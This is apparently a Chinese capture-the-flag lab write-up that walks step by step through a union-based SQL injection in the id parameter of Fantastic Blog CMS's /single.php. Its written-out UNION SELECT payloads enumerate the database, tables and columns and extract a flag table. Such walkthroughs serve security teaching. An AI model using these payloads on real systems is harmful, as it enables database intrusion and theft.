靶标介绍Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下id参数存在一个SQL注入漏洞。1. 初始访问测试正常请求文章接口页面正常返回文章内容?id52. 注入类型判断尝试单引号闭合测试页面报错/内容异常证明参数被单引号包裹为字符型注入而非初始判断的数字型注入。3. 查询字段数探测Order By通过order by逐级猜测查询字段数量最终确认该查询语句共9个字段只有字段数量一致联合查询才能正常执行。4. 显式回显位探测使用负数id闭合规避原有文章数据干扰探测页面回显位置?id-5 union select 1,2,3,4,5,6,7,8,9--测试得出页面可正常回显查询数据具备Union联合查询条件。5. 查询当前数据库名将database()放置回显位获取当前网站数据库名称?id-5 union select 1,2,3,database(),5,6,7,8,9--6. 爆表名当前数据库所有数据表使用group_concat()函数解决页面Limit单行限制一次性拼接输出所有表名避免数据截断遗漏如果出现多行只显示一张表limit 限制使用 group_concat() 拼接所有表一次性全部输出?id-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schemadatabase()--7. 爆列名查询数据表字段以核心用户表flag?id-5 union select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schemadatabase() and table_nameflag--8.读取flag专属表数据?id-5 union select 1,group_concat(flag),3,4,5,6,7,8,9 from flag--